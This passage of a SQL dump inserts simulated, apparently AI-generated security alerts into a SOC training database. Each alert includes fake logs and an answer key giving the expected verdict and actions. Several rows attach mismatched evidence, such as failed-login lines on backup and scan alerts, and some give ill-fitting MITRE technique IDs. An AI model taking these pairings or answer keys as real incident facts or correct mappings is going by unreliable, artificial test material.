4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T00:50:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.75\\\",\\\"dst_ip\\\":\\\"203.0.113.250\\\",\\\"hostname\\\":\\\"FIN-NET-05\\\",\\\"domain\\\":\\\"xyzt1234.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1780, 'Unauthorized Login Attempts from Suspicious IP', 'medium', 'Anomali', 'Multiple failed login attempts detected on a financial system from a foreign IP address. This activity is consistent with brute force attempts.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T04:10:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"192.168.3.20\",\"username\":\"mjones\",\"hostname\":\"FIN-AUTH-01\",\"failed_attempts\":8}', '2026-03-15 19:56:52', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP observed in multiple non-malicious login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mjones\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Username commonly targeted in brute force simulations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login attempts were traced back to an internal security exercise, confirming benign activity.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.283Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"mjones\\\",\\\"hostname\\\":\\\"FIN-AUTH-01\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-15T20:57:16.283Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"mjones\\\",\\\"hostname\\\":\\\"FIN-AUTH-01\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-15T20:56:16.283Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"mjones\\\",\\\"hostname\\\":\\\"FIN-AUTH-01\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-15T20:55:16.283Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"mjones\\\",\\\"hostname\\\":\\\"FIN-AUTH-01\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-03-15T20:54:16.283Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T04:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"mjones\\\",\\\"hostname\\\":\\\"FIN-AUTH-01\\\",\\\"failed_attempts\\\":8}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1781, 'Fancy Bear Exploiting SWIFT Network for Transaction Manipulation', 'critical', 'Recorded Future', 'Fancy Bear is suspected of manipulating financial transactions through SWIFT network vulnerabilities, leading to unauthorized money transfers.', 'Fraud', 'T1503', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T05:20:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.30\",\"dst_ip\":\"203.0.113.55\",\"username\":\"financeadmin\",\"hostname\":\"SWIFT-TRANS-01\",\"request_body\":\"TRANSFER 1000000 USD FROM ACC123 TO ACC456\"}', '2026-03-15 19:56:52', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in known SWIFT network attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"TRANSFER 1000000 USD FROM ACC123 TO ACC456\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious transaction pattern matching known fraud cases\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"fraud\",\"analysis_notes\":\"The network traffic indicates unauthorized transaction attempts via SWIFT, matching Fancy Bear\'s TTPs.\"}', 'Expert', 'TI', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.30\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"username\\\":\\\"financeadmin\\\",\\\"hostname\\\":\\\"SWIFT-TRANS-01\\\",\\\"request_body\\\":\\\"TRANSFER 1000000 USD FROM ACC123 TO ACC456\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.30\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"username\\\":\\\"financeadmin\\\",\\\"hostname\\\":\\\"SWIFT-TRANS-01\\\",\\\"request_body\\\":\\\"TRANSFER 1000000 USD FROM ACC123 TO ACC456\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.30\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"username\\\":\\\"financeadmin\\\",\\\"hostname\\\":\\\"SWIFT-TRANS-01\\\",\\\"request_body\\\":\\\"TRANSFER 1000000 USD FROM ACC123 TO ACC456\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.30\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"username\\\":\\\"financeadmin\\\",\\\"hostname\\\":\\\"SWIFT-TRANS-01\\\",\\\"request_body\\\":\\\"TRANSFER 1000000 USD FROM ACC123 TO ACC456\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.30\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"username\\\":\\\"financeadmin\\\",\\\"hostname\\\":\\\"SWIFT-TRANS-01\\\",\\\"request_body\\\":\\\"TRANSFER 1000000 USD FROM ACC123 TO ACC456\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1782, 'Routine IT Vulnerability Scan Detected as Brute Force Attack', 'low', 'Splunk', 'A security alert was triggered by repeated login failures from an internal IP address. This activity was identified as a routine vulnerability scan by the IT department.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"server01\",\"failed_attempts\":25}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for legitimate vulnerability scanning\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly used administrative account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address is part of the internal network and the activity aligns with scheduled security scans.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.289Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-16T03:04:28.289Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-16T03:03:28.289Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-16T03:02:28.289Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-16T03:01:28.289Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1783, 'Authorized Administrative Backup Misidentified as Data Exfiltration', 'low', 'Azure Sentinel', 'Data transfer activity from a sensitive database server to a backup server was flagged. This was verified as an authorized backup operation.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.6\",\"username\":\"backup_admin\",\"hostname\":\"backup01\",\"data_volume\":\"500GB\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal backup server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal database server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer was a scheduled backup task performed by the IT department.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.291Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.6\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"data_volume\\\":\\\"500GB\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.291Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.6\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"data_volume\\\":\\\"500GB\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.291Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.6\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"data_volume\\\":\\\"500GB\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.291Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.6\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"data_volume\\\":\\\"500GB\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.291Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.6\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"data_volume\\\":\\\"500GB\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1784, 'Routine IT Vulnerability Scan Detected', 'low', 'Splunk', 'A series of network connections from an internal IP address was detected, resembling a vulnerability scan. This activity is part of routine IT security checks.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.1\",\"username\":\"admin\",\"hostname\":\"scanner01\",\"command_line\":\"nmap -sS 192.168.1.1\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for routine scanning\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 192.168.1.1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as a legitimate vulnerability scan command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Routine vulnerability scans are conducted by IT to ensure network security compliance.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.292Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.1\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS 192.168.1.1\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.292Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.1\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS 192.168.1.1\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.292Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.1\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS 192.168.1.1\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.292Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.1\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS 192.168.1.1\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.292Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.1\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS 192.168.1.1\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1785, 'Authorized Administrative Backup Activity Detected', 'low', 'Azure Sentinel', 'An administrative account performed a series of backup operations on critical servers. This is a scheduled, authorized activity.', 'Data Exfil', 'T1027', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.10\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"command_line\":\"backup --incremental --servers 10.0.0.10\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP performing authorized backup\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"backup --incremental --servers 10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as a legitimate backup command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected activity matches the pattern of scheduled backup operations by authorized personnel.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.293Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"command_line\\\":\\\"backup --incremental --servers 10.0.0.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.293Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"command_line\\\":\\\"backup --incremental --servers 10.0.0.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.293Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"command_line\\\":\\\"backup --incremental --servers 10.0.0.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.293Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"command_line\\\":\\\"backup --incremental --servers 10.0.0.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.293Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"command_line\\\":\\\"backup --incremental --servers 10.0.0.10\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1786, 'Routine IT Vulnerability Scanning Detected', 'low', 'Splunk', 'A series of network scans were detected originating from an internal IT department system. The scans are part of routine vulnerability assessments scheduled by the IT team.', 'Network Scanning', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.100\",\"username\":\"it_admin\",\"hostname\":\"vulnscan01\",\"command_line\":\"nmap -A 192.168.1.100\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by IT department for scanning\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern 